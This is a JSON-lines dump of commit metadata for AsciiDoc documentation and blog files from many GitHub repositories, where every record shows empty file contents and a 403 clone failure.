2017-02-14-Stuff-test.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-02-14-Stuff-test.adoc","new_file":"_posts\/2017-02-14-Stuff-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"699db6a98460a0d6c7360963549efb35fcc60b53","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 
2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e21a5569db5b45971128b4dbc6b2f598fc3cf7c1","subject":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","message":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23410972db4c473facf738a0234c07830ba288d7","subject":"doc:v2.36 release notes","message":"doc:v2.36 release notes\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/release_notes.asciidoc","new_file":"doc\/release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e92ea047c2d04d5ed58657ee7475a8e1b5644906","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,marbon87\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab99deeaf017d002dd5619e352ac77558a91e6fd","subject":"starting to build structure for fabric8 docs","message":"starting to build structure for fabric8 docs\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-kubernetes-fabric8.adoc","new_file":"chapters\/docker-kubernetes-fabric8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-developer-demos\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"52df00a6a1ef5d1f91b8c2c373eff7727df32b8b","subject":"Add hidden transformer module doc.","message":"Add hidden transformer module doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/hidden_transformer.adoc","new_file":"doc\/dev\/modules\/hidden_transformer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"737338b6456d77e58541f098c2afe490a2cf6680","subject":"Moved Security docs to repo","message":"Moved Security docs to repo\n","repos":"cunningt\/camel,apache\/camel,adessaigne\/camel,onders86\/camel,DariusX\/camel,kevinearls\/camel,objectiser\/camel,objectiser\/camel,Fabryprog\/camel,cunningt\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,adessaigne\/camel,Fabryprog\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,pmoerenhout\/camel,cunningt\/camel,DariusX\/camel,tadayosi\/camel,CodeSmell\/camel,alvinkwekel\/camel,nicolaferraro\/camel,kevinearls\/camel,tadayosi\/camel,gnodet\/camel,onders86\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,ullgren\/camel,alvinkwekel\/camel,alvinkwekel\/camel,objectiser\/camel,zregvart\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,gnodet\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,tdiesler\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,nicolaferraro\/camel,zregvart\/camel,pmoerenhout\/camel,CodeSmell\/camel,onders86\/camel,tdiesler\/camel,christophd\/camel,davidkarlsen\/camel,gnodet\/camel,kevinearls\/camel,davidkarlsen\/camel,apache\/camel,kevinearls\/camel,apache\/camel,tdiesler\/camel,gnodet\/camel,onders86\/camel,Fabryprog\/camel,christophd\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,ullgren\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,zregvart\/camel,objectiser\/camel,CodeSmell\/camel,kevinearls\/camel,pax95\/camel,nikhilvibhav\/camel,zregvart\/camel,gnodet\/camel,christophd\/camel,alvinkwekel\/camel,tdiesler\/camel,onders86\/camel,tadayosi\/camel,mcollovati\/camel,mcollovati\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,tadayosi\/camel,DariusX\/camel,tdiesler\/camel,pax95\/camel,tadayosi\/camel,mcollovati\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,Fabryprog\/camel,nikhilvibhav\/camel,kevinearls\/camel,nicolaferraro\/camel,onders86\/camel,adessaigne\/camel","old_file":"docs\/user-manual\/en\/security.adoc","new_file":"docs\/user-manual\/en\/security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8027113a3688b3abc2317ad75fcc41e292e349a6","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d81865f95ecd7429cce42f75b64312ede35ad4c4","subject":"Remove `TODO.adoc` as unused","message":"Remove `TODO.adoc` as unused\n","repos":"spodin\/algorithms","old_file":"TODO.adoc","new_file":"TODO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"06638a0822f904c01c4968809d4d9e261f1eb863","subject":"Reorganize some sections and add empty sections.","message":"Reorganize some sections and add empty sections.\n","repos":"yurrriq\/cats,OlegTheCat\/cats,tcsavage\/cats,alesguzik\/cats,funcool\/cats,mccraigmccraig\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"}
{"commit":"f344d553fe387f025e8d2de889ce4eb585fb6555","subject":"Bugfix in documentation: incorrect path to resource in example","message":"Bugfix in documentation: incorrect path to resource in example\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"0c33f68c8b4c8d42f047fc249db62a724032e55d","subject":"Created doc for developing Forge addons","message":"Created doc for developing Forge addons\n\nCopied from the Forge Core README.\n","repos":"forge\/docs,luiz158\/docs,agoncal\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,addonis1990\/docs","old_file":"get_started\/Develop-your-addon.asciidoc","new_file":"get_started\/Develop-your-addon.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"}
{"commit":"ca8a2450a0683ff339356769b0d1f7124ec18ae8","subject":"y2b create post Cinnamon Bun Potato Chips?","message":"y2b create post Cinnamon Bun Potato Chips?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-08-20-Cinnamon-Bun-Potato-Chips.adoc","new_file":"_posts\/2014-08-20-Cinnamon-Bun-Potato-Chips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c73e4de0e0344aff7861e6c3e91903abf5cc1d22","subject":"fdroid: initial notes","message":"fdroid: initial notes\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"fdroid\/NOTES.adoc","new_file":"fdroid\/NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c58e95a19ac4c106748968069f6a1e5a7f441a58","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"62c8efdfb443bd707bf26bd6a2d65e33fab955df","subject":"y2b create post This 3D Audio Experience Will Blow Your Mind (Wear Headphones)","message":"y2b create post This 3D Audio Experience Will Blow Your Mind (Wear Headphones)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-19-This-3D-Audio-Experience-Will-Blow-Your-Mind-Wear-Headphones.adoc","new_file":"_posts\/2017-11-19-This-3D-Audio-Experience-Will-Blow-Your-Mind-Wear-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"52c471787fa35bd746e1b5af7550637bab48bb75","subject":"Added documentation for the binary-serializer pipeline step.","message":"Added documentation for the binary-serializer pipeline step.\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"6e008e87c47c6bb9ce209e7bd49c919b1a93c258","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-gateway,spring-cloud-incubator\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway,spencergibb\/spring-cloud-gateway","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spencergibb\/spring-cloud-gateway.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"16a8d5245f025dbfbc27c182ba932d5b6ea516b5","subject":"Reflect cross-cluster search in \"dedicated\" terminology (#23771)","message":"Reflect cross-cluster search in \"dedicated\" terminology (#23771)\n\n* Reflects cross-cluster search in dedicated node settings\r\n\r\n* Fix space issue\r\n","repos":"wangtuo\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,winstonewert\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,mohit\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,alexshadow007\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,HonzaKral\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,Stacey-Gammon\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,kalimatas\/elasticsearch,glefloch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,robin13\/elasticsearch,naveenhooda2000\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,gfyoung\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,s1monw\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,nazarewk\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,mjason3\/elasticsearch,nezirus\/elasticsearch,jprante\/elasticsearch,vroyer\/elassandra,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,LeoYao\/elasticsearch","old_file":"docs\/reference\/modules\/node.asciidoc","new_file":"docs\/reference\/modules\/node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"1319f4f138ad41695f1ec44b946f3170097b2513","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"b914707a10e1de5fa7626c625d631cc294498c66","subject":"Update 2015-09-25-Back-to-Basic.adoc","message":"Update 2015-09-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_file":"_posts\/2015-09-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"d4e980eeeb779479e642c2870b68e4a5f6b8d6ec","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"aec8b839198fd645eb28a30326c3ead6465cdf08","subject":"y2b create post The Clock Is Ticking...","message":"y2b create post The Clock Is Ticking...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-26-The-Clock-Is-Ticking.adoc","new_file":"_posts\/2016-09-26-The-Clock-Is-Ticking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"a4fc4bb8c81f746b2b42549d0bb77557d03d2ebe","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"c58e846a55c8cd9277d66b0fa9d3219f99b195dc","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"ce8fa7b9097718b0cbeaa6f819e2927d988dfa04","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"49b74f550e6280021e5f41495a7013ed96eb7634","subject":"Update 2018-09-04-this-is-my-life.adoc","message":"Update 2018-09-04-this-is-my-life.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-09-04-this-is-my-life.adoc","new_file":"_posts\/2018-09-04-this-is-my-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"7a2a1568589787d9314143e40f57599a21f7d6e5","subject":"#121 Initial version of autocomplete user manual page (work in progress)","message":"#121 Initial version of autocomplete user manual page (work in progress)\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/autocomplete.adoc","new_file":"docs\/autocomplete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"4a8f27f40d912c31ffa877222d439b6845dc6e79","subject":"Add engine documentation","message":"Add engine documentation\n\n* Includes a code listing by directory, overview of the engine\narchitecture, an overview of some important structures and a general\ntodo list of the things I thought while writing it.\n\n[NOTE]\n====\nTODO: Be less repetitive, and more funny.\n====\n","repos":"RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine,RedCraneStudio\/redcrane-engine","old_file":"code.adoc","new_file":"code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RedCraneStudio\/redcrane-engine.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"}
{"commit":"f8762defb5ed5f4e7eec9fe996ed73ade49d4f9d","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"f0e21509865f13b7df9fd4b479f6a6389cc0113a","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
{"commit":"e11b7aad38cc02c3cd1cdcd487672fe3a9ba4bc3","subject":"Add design.asciidoc explaining Kakoune design","message":"Add design.asciidoc explaining Kakoune design\n","repos":"casimir\/kakoune,elegios\/kakoune,Asenar\/kakoune,alpha123\/kakoune,elegios\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,lenormf\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,danr\/kakoune,rstacruz\/kakoune,danielma\/kakoune,ekie\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,Asenar\/kakoune,flavius\/kakoune,alpha123\/kakoune,Somasis\/kakoune,casimir\/kakoune,ekie\/kakoune,danr\/kakoune,Asenar\/kakoune,jkonecny12\/kakoune,flavius\/kakoune,Somasis\/kakoune,lenormf\/kakoune,xificurC\/kakoune,occivink\/kakoune,danielma\/kakoune,xificurC\/kakoune,flavius\/kakoune,danielma\/kakoune,mawww\/kakoune,mawww\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,occivink\/kakoune,casimir\/kakoune,jjthrash\/kakoune,danr\/kakoune,alpha123\/kakoune,xificurC\/kakoune,danr\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,jjthrash\/kakoune,zakgreant\/kakoune,Asenar\/kakoune,ekie\/kakoune,alexherbo2\/kakoune,ekie\/kakoune,rstacruz\/kakoune,casimir\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,rstacruz\/kakoune,occivink\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,lenormf\/kakoune,elegios\/kakoune,elegios\/kakoune,alpha123\/kakoune,zakgreant\/kakoune,lenormf\/kakoune,xificurC\/kakoune,mawww\/kakoune","old_file":"doc\/design.asciidoc","new_file":"doc\/design.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"}
{"commit":"f6c30e9f28d60c6214e0ab045522c6c23c2b4abe","subject":"OSIS-195 Updated the technical manual with instructions to update the internship submodule.","message":"OSIS-195 Updated the technical manual with instructions to update the internship submodule.\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"}
{"commit":"5cdc5ab436f00f3c6dbfcbde69695cb366ee8723","subject":"Update data_sets.adoc","message":"Update data_sets.adoc","repos":"lowcloudnine\/singularity-spark,lowcloudnine\/singularity-spark","old_file":"docs\/data_sets.adoc","new_file":"docs\/data_sets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lowcloudnine\/singularity-spark.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"79f61b4c4963f1f8dc06a45fc159efc5bb14d415","subject":"Add skinshop module doc.","message":"Add skinshop module doc.\n","repos":"ImagicTheCat\/vRP,ImagicTheCat\/vRP","old_file":"doc\/dev\/modules\/skinshop.adoc","new_file":"doc\/dev\/modules\/skinshop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ImagicTheCat\/vRP.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"}
